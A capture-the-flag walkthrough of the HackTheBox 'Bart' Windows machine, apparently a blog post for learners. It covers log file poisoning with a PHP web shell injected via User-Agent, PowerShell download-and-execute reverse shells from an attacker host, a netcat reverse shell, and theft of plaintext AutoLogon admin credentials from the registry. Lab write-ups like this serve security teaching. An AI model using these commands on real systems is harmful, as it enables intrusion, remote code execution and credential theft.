We covered Log File Poisoning and Windows Privilege Escalation by exploiting the auto-logon in Windows which saves credentials in plaintext. This was part of HackTheBox Bart

BART is a WINDOWS machine, and is of MEDIUM difficulty.

Initial Enumeration

I started with an Nmap scan, which revealed an open port 80 running Microsoft Internet Information Service (IIS) version 10. The scan also indicated a redirect to forum.par.htb, so I added this and other related hostnames (monitor.bart, internal01.bart) to my /etc/hosts file. Browsing to forum.bart.htb led to a WordPress site. I attempted to access wp-admin but encountered an internal server error. By viewing the page source, I found an email address for a developer, Harvey Potter (H.Potter@...), and deduced the email naming convention for other team members (e.g., S.Brown, D.Simons, R.Hilton).

Directory Brute-forcing and Login

I used gobuster to find hidden directories and discovered /monitor and /forum. Navigating to bart.htb/monitor redirected to a login form. Using the “Forgot Password” functionality, I confirmed that the username format was the first name (e.g., “Harvey”). I guessed the password for “Harvey” as “Potter” (his surname) and successfully logged in. This was likely simplified due to the presence of a CSRF token that would complicate automated brute-forcing.

Internal Chat and Source Code Analysis

Inside the monitor portal, an “Internal Chat” link led to internal01.bart. This new page had another login form for a “Simple Chat” application. By inspecting the CSS, I found the author of the application. Googling “Simple Chat” led me to its source code on GitHub. The source code revealed a registration functionality (register.php) that accepted uname and password parameters via a POST request. I used curl to send a POST request and register a new user.

Log File Poisoning

After logging into the chat application, I noticed a “Log” button. Intercepting the request with Burp Suite showed that clicking “Log” sent a request to log/log.php, which wrote details (date, username, user-agent) to log/log.txt. The username was hardcoded as “Harvey”. I realized this was an opportunity for log file poisoning. By manipulating the User-Agent header, I could inject PHP code. First, I injected a simple PHP shell: <?php system($_GET['CMD']); ?> into the User-Agent. Accessing log/log.php?CMD=whoami confirmed command execution.

Gaining Initial Access (Reverse Shell)

I set up a Python HTTP server to host a Nishang PowerShell reverse shell script (invoke_powershell_tcp.ps1). I modified the script with my IP address and a listening port. Using the log poisoning vulnerability, I crafted a PowerShell command to download and execute the reverse shell script from my server. I started a netcat listener and successfully received a reverse shell.

Privilege Escalation

The initial shell was running as a low-privilege user. I checked privileges with whoami /priv and found SeImpersonatePrivilege was enabled, suggesting Juicy Potato could be an option, but I chose a different path. I mentioned that running WinPEAS would reveal an “AutoLogon” vulnerability where administrator credentials are stored in the registry. The initial netcat shell was 32-bit, causing issues with some commands. I downloaded a 64-bit nc64.exe to the target machine and started a new, more stable 64-bit reverse shell.

I then queried the registry key HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon to retrieve the plaintext DefaultUserName (Administrator) and DefaultPassword. Using PowerShell, I created credential objects with the retrieved administrator username and password. I prepared another Nishang reverse shell script (shell1.ps1) with a different port. Finally, I used Invoke-Command with the -Credential parameter (using the admin credentials) and -ComputerName localhost to download and execute the new reverse shell script. This provided a new reverse shell running as the Administrator, allowing me to access the root flag.

Technical Commands

  • nmap <target_ip>
  • cat /etc/hosts
  • gobuster dir -u http://forum.bart.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt --exclude-length 150,693
  • curl -X POST -d "uname=myname&password=password123" http://internal01.bart/simplechat/register.php
  • http://internal01.bart/log/log.txt (Accessing log file)
  • http://internal01.bart/log/log.php (Accessing PHP info via poisoned log)
  • http://internal01.bart/log/log.php?CMD=whoami (Executing command via poisoned log)
  • ls
  • cd shells
  • cd nishang
  • cp Invoke-PowerShellTcp.ps1 ../../shell.ps1
  • ifconfig or ip a
  • python3 -m http.server 8000
  • powershell -ep bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://<attacker_ip>:8000/shell.ps1')" (PowerShell download and execute via log poisoning)
  • nc -lvnp 4545 (Netcat listener)
  • whoami /priv
  • powershell -c "Invoke-WebRequest -Uri http://<attacker_ip>:8000/nc64.exe -OutFile nc64.exe" (PowerShell command to download nc64.exe)
  • ./nc64.exe <attacker_ip> 4546 -e powershell.exe (To start a 64-bit reverse shell)
  • reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName (Registry query for AutoLogon credentials)
  • reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword
  • $UserName = "Bart\Administrator" (PowerShell command to create credential object)
  • $Password = ConvertTo-SecureString "THE_RETRIEVED_PASSWORD" -AsPlainText -Force
  • $Cred = New-Object System.Management.Automation.PSCredential($UserName, $Password)
  • cp shell.ps1 shell1.ps1
  • nano shell1.ps1
  • nc -lvnp 4547
  • Invoke-Command -ScriptBlock { IEX (New-Object Net.WebClient).DownloadString('http://<attacker_ip>:8000/shell1.ps1') } -Credential $Cred -ComputerName localhost (PowerShell command to execute reverse shell as Administrator)
  • cd ..
  • ls
  • cd Desktop
  • type root.txt

Video Walkthrough

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles